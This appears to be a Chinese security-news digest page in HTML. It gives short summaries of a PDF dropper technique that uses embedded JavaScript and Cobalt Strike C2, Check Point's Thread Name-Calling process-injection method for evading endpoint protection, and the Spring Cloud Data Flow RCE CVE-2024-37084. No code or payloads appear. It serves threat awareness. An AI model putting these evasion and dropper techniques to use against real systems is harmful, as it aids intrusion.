	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">本网页介绍了如何利用PDF文件中的JavaScript执行能力，将恶意代码注入PDF文件，从而实现从特定URL自动下载文件的攻击技术，即PDF Dropper攻击，并通过Cobalt Strike等工具建立Command and Control（C2）连接。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.8306451612903226" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="372" src="https://wechat2rss.xlab.app/img-proxy/?k=1a8cc1b5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmUzTB0pLOicuUMdxfdo1ZNFAGs6Ef6Dkmg1SOTRvZcDh8BoqBsc85Jib8RuB4vb4FrDK1e4Q2I5v9g%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Cobalt Strike 攻击：利用恶意 JavaScript 注入 PDF 文件创建 PDF Dropper</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmUzTB0pLOicuUMdxfdo1ZNFFfFooRaw0NDhFy26LGUpN4V40pHthI6XtEOAmTwtmwmxszC6kazUDw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmUzTB0pLOicuUMdxfdo1ZNFFfFooRaw0NDhFy26LGUpN4V40pHthI6XtEOAmTwtmwmxszC6kazUDw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5122488448412244"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">PDF文件可以执行JavaScript代码，这使得它们成为了潜在的攻击载体。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">通过在PDF文件中嵌入恶意JavaScript代码，可以实现自动下载和执行远程文件的攻击，这种技术被称为PDF Dropper。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">攻击者可以利用这种方法来建立与受害者系统的C2连接，从而实现对系统的控制。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">尽管浏览器和PDF阅读器对PDF中的JavaScript执行有限制，但仍有可能绕过这些限制执行特定操作。</section></li></ul>
	<br/>
	<p>🏷️: PDF攻击, 恶意代码注入, JavaScript, 网络安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x02
			 利用线程名称进行攻击的新技术</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Check Point Research 发现了一种新的进程注入技术，名为 Thread Name-Calling，它利用 Windows 的线程描述 API 来绕过终端保护产品，实现恶意代码的注入。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.14602587800369685" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="541" src="https://wechat2rss.xlab.app/img-proxy/?k=d9dab286&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmUzTB0pLOicuUMdxfdo1ZNF7BhJxZBic9Fn435k9OicWPju81DqKic7vDOHKKLoFOpc8oahSafWcHUkQ%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.9058380414312618" data-w="531" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=2f26f68c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2Ficqm3vRUymZmUzTB0pLOicuUMdxfdo1ZNFgxMK9SQ4TkdPKUnvia9HKIYKv0N3GwwLN0MicJFrJxExHbCvvtQkgNuA%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.5037037037037037" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=b750f201&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmUzTB0pLOicuUMdxfdo1ZNFdPxmWKUQv4icibD9sdR6X8f9t73ibfVMSurYJZDbhhAvXqkufl2WY2L0w%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">利用线程名称实现进程注入的新技术</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">线程名称调用：一种利用线程名称的进程注入技术</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmUzTB0pLOicuUMdxfdo1ZNFzAYVol1JYaibbrta4zVGCwkZl8xWibUzVWQ0Gk02lQuUwia54bEFlGMiaA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmUzTB0pLOicuUMdxfdo1ZNFzAYVol1JYaibbrta4zVGCwkZl8xWibUzVWQ0Gk02lQuUwia54bEFlGMiaA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844211221258428"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">进程注入是攻击者工具包中的重要技术，用于防御逃避、进程干预和权限提升。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">传统的注入方法容易被 AV 和 EDR 产品检测，因此攻击者和红队成员不断寻找新的 API 来实现注入，以逃避检测。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Thread Name-Calling 技术利用了相对较新的 API，这些 API 没有被常规的监控工具所关注，从而能够绕过现有的保护措施。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">该技术不需要对目标进程拥有写入权限，仅需最小的访问权限，这减少了被检测的可能性。</section></li></ul>
	<br/>
	<p>🏷️: Process Injection, Thread Name-Calling, API Abuse, Endpoint Protection</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x03
			 Spring Cloud Data Flow 远程代码执行漏洞（CVE-2024-37084）</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Spring Cloud Data Flow 中的 Skipper 组件存在一个关键的远程代码执行漏洞（CVE-2024-37084），该漏洞被评定为 CVSS 9.8 分，表明其严重性。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Spring Cloud Data Flow 远程代码执行漏洞 CVE-2024-37084</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Spring Cloud Data Flow 发现高危漏洞CVE-2024-37084</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmUzTB0pLOicuUMdxfdo1ZNFib1F0c6eG4wFHibuny4CkyfcewYUjmd2xCtforX8Tgb5g7p4ic8t5s4tw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmUzTB0pLOicuUMdxfdo1ZNFib1F0c6eG4wFHibuny4CkyfcewYUjmd2xCtforX8Tgb5g7p4ic8t5s4tw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855411415282881"></mp-common-miniprogram>
	</section>
